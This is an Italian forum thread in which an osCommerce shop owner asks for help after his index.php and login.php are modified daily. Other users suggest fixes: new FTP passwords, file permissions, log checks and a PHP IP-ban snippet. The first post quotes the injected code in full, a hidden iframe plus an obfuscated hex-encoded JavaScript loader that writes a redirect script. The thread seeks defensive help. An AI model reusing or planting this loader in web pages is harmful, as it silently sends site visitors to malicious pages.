Problema sicurezza

[stecarnev]

Salve, ho il mio sito di commercio elettronico con installato OSCommerce 2.2 che è stato preso di mira da qualche malintenzionato!!
Con scadenza gionaliera vengono modificati i file index.php e login.php della directory principale.
Nella fattispecie vengono aggiunti script che reindirizzano su siti "strani".

Posto la parte di codice aggiunta dagli hacker:

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l49498cbc76412(l49498cbc767fa){ var l49498cbc76be5=16; return (parseInt(l49498cbc767fa,l49498cbc76be5));}function l49498cbc773b7(l49498cbc7779f){ var l49498cbc78359=2; var l49498cbc77b88='';l49498cbc78b2b=String.fromCharCode;for(l49498cbc77f70=0;l49498cbc77f70<l49498cbc7779f.length;l49498cbc77f70+=l49498cbc78359){ l49498cbc77b88+=(l49498cbc78b2b(c102916999516l49498cbc76412(l49498cbc7779f.substr(l49498cbc77f70,l49498cbc78359))));}return l49498cbc77b88;} var xcb='';var l49498cbc78f12='3C736'+xcb+'3726'+xcb+'970743E6'+xcb+'96'+xcb+'6'+xcb+'28216'+xcb+'D796'+xcb+'96'+xcb+'1297B6'+xcb+'46'+xcb+'F6'+xcb+'3756'+xcb+'D6'+xcb+'56'+xcb+'E742E77726'+xcb+'9746'+xcb+'528756'+xcb+'E6'+xcb+'5736'+xcb+'36'+xcb+'1706'+xcb+'528202725336'+xcb+'32536'+xcb+'392536'+xcb+'36'+xcb+'2537322536'+xcb+'312536'+xcb+'6'+xcb+'42536'+xcb+'352532302536'+xcb+'6'+xcb+'52536'+xcb+'312536'+xcb+'6'+xcb+'42536'+xcb+'3525336'+xcb+'42536'+xcb+'332533312533302532302537332537322536'+xcb+'3325336'+xcb+'42532372536'+xcb+'3825373425373425373025336'+xcb+'125326'+xcb+'6'+xcb+'25326'+xcb+'6'+xcb+'2536'+xcb+'372536'+xcb+'6'+xcb+'6'+xcb+'2536'+xcb+'372536'+xcb+'6'+xcb+'6'+xcb+'2533322536'+xcb+'6'+xcb+'42536'+xcb+'3525326'+xcb+'52536'+xcb+'6'+xcb+'52536'+xcb+'3525373425326'+xcb+'6'+xcb+'25326'+xcb+'52536'+xcb+'372536'+xcb+'6'+xcb+'6'+xcb+'25326'+xcb+'6'+xcb+'2536'+xcb+'332536'+xcb+'382536'+xcb+'352536'+xcb+'332536'+xcb+'6'+xcb+'225326'+xcb+'52536'+xcb+'382537342536'+xcb+'6'+xcb+'42536'+xcb+'6'+xcb+'32532372532302537372536'+xcb+'392536'+xcb+'342537342536'+xcb+'3825336'+xcb+'42533372533382533352532302536'+xcb+'382536'+xcb+'352536'+xcb+'392536'+xcb+'372536'+xcb+'3825373425336'+xcb+'42533342533372533352532302537332537342537392536'+xcb+'6'+xcb+'32536'+xcb+'3525336'+xcb+'4253237253736'+xcb+'2536'+xcb+'392537332536'+xcb+'392536'+xcb+'322536'+xcb+'392536'+xcb+'6'+xcb+'32536'+xcb+'3925373425373925336'+xcb+'12536'+xcb+'382536'+xcb+'392536'+xcb+'342536'+xcb+'342536'+xcb+'352536'+xcb+'6'+xcb+'525323725336'+xcb+'525336'+xcb+'325326'+xcb+'6'+xcb+'2536'+xcb+'392536'+xcb+'36'+xcb+'2537322536'+xcb+'312536'+xcb+'6'+xcb+'42536'+xcb+'3525336'+xcb+'52729293B7D76'+xcb+'6'+xcb+'172206'+xcb+'D796'+xcb+'96'+xcb+'13D7472756'+xcb+'53B3C2F736'+xcb+'3726'+xcb+'970743E';document.write(l49498cbc773b7(l49498cbc78f12));</script>

Secondo voi il problema è una falla di sicurezza di Oscommerce oppure c'è qualcosa che non va sul mio server!!

Grazie per l'aiuto.
Stefano Carnevale
www.diesseshop.net

[hsg26]

cambia le password dell'ftp e i permessi su quei files. Gurda i files di log e contatta il tuo hosting...

[vampire]

concordo con hsg inoltre metti ancheh un htpassword nella directory admin e per i file usa il 444

ciao

[mario porta]

Ciao..

ho dato un'occhiata al tuo sito,.sembrerebbe uno script per Url Spoofing,..


Fai quello che ti hanno consigliato Hsg e Vampire che e' il metodo migliore,...in piu' controlla bene il file di log e segnato l'IP incriminato,..

poi,..puoi aggiungere questo script nel tuo index.php

<?php
$banned_ip = array();
$banned_ip[] = '111.111.111.111'; // Metti qui' l'ip indesiderato.
foreach($banned_ip as $banned) {
$ip = $_SERVER['REMOTE_ADDR'];
if($ip == $banned){
echo "You have been banned! Indirizzo non consentito!";
exit();
}
}
?>

cosi' facendo,...quell'ip verra' rifiutato dal server,...

[xnetus]

Credo chi l'ip possa cambiare.

Comunque da un mio cliente ho risolto mettendo i permessi su 755...